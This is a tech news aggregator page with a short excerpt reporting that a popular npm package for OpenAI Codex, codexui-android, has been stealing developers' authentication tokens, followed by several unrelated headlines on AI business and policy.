TECH NEWS

A popular OpenAI Codex tool with 29,000 weekly downloads has been quietly stealing developer tokens for a month

TL;DR

A popular npm package for OpenAI Codex with 29,000 weekly downloads has been stealing developer authentication tokens for a month. The same credential-theft chain also ran through two Android apps with over 60,000 combined downloads.

The npm package looked legitimate. It had an active GitHub repository, steady development history, and roughly 29,000 weekly downloads. For developers using OpenAI Codex, it offered exactly what it advertised: a remote web UI for the AI coding tool.

But for the past month, every invocation of codexui-android has also been silently reading the contents of the user’s Codex authentication file and shipping it to an attacker-controlled server. The stolen data includes access tokens, refresh tokens, ID tokens, and account IDs, everything needed to impersonate the developer indefinitely.

“The refresh_token doesn’t expire,” Aikido Security researcher Charlie Eriksen wrote. “An attacker holding it can silently impersonate you indefinitely.”

How...

Copyright of this story solely belongs to thenextweb.com. To see the full text click HERE

Superhuman acquires AI detection startup GPTZero, which has 19M+ registered users and $30M in annual recurring revenue; PitchBook: GPTZero is valued at $88M+

Alex Bores, a NY congressional candidate at the center of a proxy war over AI regulation involving millions in AI PAC spending, was defeated by Micah Lasher

Been waiting for SharkNinja? Its best-Selling kitchen appliances are now on Flipkart

The NSA was red-teaming Mythos 5 before losing access amid the Anthropic dispute; the tests showed Mythos identified cybersecurity flaws in classified systems